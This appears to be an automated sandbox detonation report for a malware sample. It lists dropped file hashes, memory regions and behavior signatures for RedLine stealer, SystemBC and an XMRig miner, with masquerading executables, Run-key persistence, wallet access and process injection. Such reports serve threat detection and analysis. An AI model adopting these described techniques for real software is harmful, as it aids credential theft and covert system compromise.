SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/1988-106-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

memory/1344-108-0x000000013F660000-0x000000014002A000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1580-117-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/1988-119-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1528-121-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1580-120-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/1528-123-0x0000000002680000-0x0000000002700000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1528-125-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1528-126-0x0000000002680000-0x0000000002700000-memory.dmp

memory/1580-127-0x0000000000FE0000-0x0000000001400000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1344-130-0x000000013F660000-0x000000014002A000-memory.dmp

memory/1580-131-0x0000000002D90000-0x0000000002DD0000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f1ab24301dbb9f3d71747a9648b246a8
SHA1 d66c552807c82193020d4946cd1183e2b0a470d1
SHA256 79f0da1bb888ac942d36aa29f0bfcb73f78a053e0352341f5e63e96ccecdac07
SHA512 1a904b7c266034590bb4b06efceb3020d1f9c77cbc6c1154c3fa57e43fdf365a9d8b4cbf734669453ad3274e7037ee362c0234111a3105db9cf567e33113ee3b

memory/1908-140-0x000000001B020000-0x000000001B302000-memory.dmp

memory/1908-141-0x0000000002250000-0x0000000002258000-memory.dmp

memory/1908-142-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1908-143-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/1908-144-0x00000000026C0000-0x0000000002740000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1908-146-0x00000000026CB000-0x0000000002702000-memory.dmp

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp3E1A.tmp.bat

MD5 db65c6d1bce7ecac88b67279788f4ac7
SHA1 99dbfe59b863c5f230cb67eab50f1861be5c3097
SHA256 0323f30b65ade053ef369dbb44fe50c204c794c99d77fe30069696062e4778a8
SHA512 f2254375ba896e498460bc7a96a9ab4daf95e0ca9a43239a599625bff22fc5c447d4186d43ce5628d39581c1a8ea1f8c74b3819ef0d1816999e19ab4f0e5e785

memory/1580-153-0x0000000000FE0000-0x0000000001400000-memory.dmp

memory/1300-161-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1580-163-0x0000000006FD0000-0x00000000073F0000-memory.dmp

memory/1300-162-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1300-164-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1580-165-0x0000000000FE0000-0x0000000001400000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp3E1A.tmp.bat

MD5 db65c6d1bce7ecac88b67279788f4ac7
SHA1 99dbfe59b863c5f230cb67eab50f1861be5c3097
SHA256 0323f30b65ade053ef369dbb44fe50c204c794c99d77fe30069696062e4778a8
SHA512 f2254375ba896e498460bc7a96a9ab4daf95e0ca9a43239a599625bff22fc5c447d4186d43ce5628d39581c1a8ea1f8c74b3819ef0d1816999e19ab4f0e5e785

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1300-171-0x00000000054D0000-0x0000000005510000-memory.dmp

memory/1800-172-0x000000013F2A0000-0x000000013FC6A000-memory.dmp

memory/1300-173-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/268-175-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1800-176-0x000000013F2A0000-0x000000013FC6A000-memory.dmp

memory/1300-177-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1344-180-0x00000000000B0000-0x00000000000D0000-memory.dmp

memory/1800-179-0x000000013F2A0000-0x000000013FC6A000-memory.dmp

memory/1300-181-0x00000000054D0000-0x0000000005510000-memory.dmp

memory/1300-182-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/268-184-0x0000000140000000-0x0000000140029000-memory.dmp

memory/1344-185-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1300-186-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1344-189-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1300-190-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1344-192-0x0000000000290000-0x00000000002B0000-memory.dmp

memory/1344-194-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1300-195-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1344-198-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1344-199-0x0000000000290000-0x00000000002B0000-memory.dmp

memory/1300-201-0x0000000000A10000-0x0000000000E30000-memory.dmp

memory/1344-203-0x0000000140000000-0x00000001407EF000-memory.dmp

memory/1300-205-0x0000000000A10000-0x0000000000E30000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 23:05

Reported

2023-05-07 01:42

Platform

win10v2004-20230220-en

Max time kernel

152s

Max time network

166s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4408 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 260 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4408 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\0e4e3cdacfbe29fdc3e189e52ee8228e.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1912 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 336 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1912 wrote to memory of 4812 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2668 wrote to memory of 1776 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2400 wrote to memory of 4324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2400 wrote to memory of 4324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2252 wrote to memory of 488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 488 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 4432 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 3008 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2252 wrote to memory of 3008 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2400 wrote to memory of 4684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2400 wrote to memory of 4684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2400 wrote to memory of 4684 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 2400 wrote to memory of 3656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2400 wrote to memory of 3656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 2400 wrote to memory of 3656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 3784 wrote to memory of 5012 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 5012 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 2084 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 2084 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 996 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 4568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3784 wrote to memory of 4568 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 3476 wrote to memory of 4720 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe
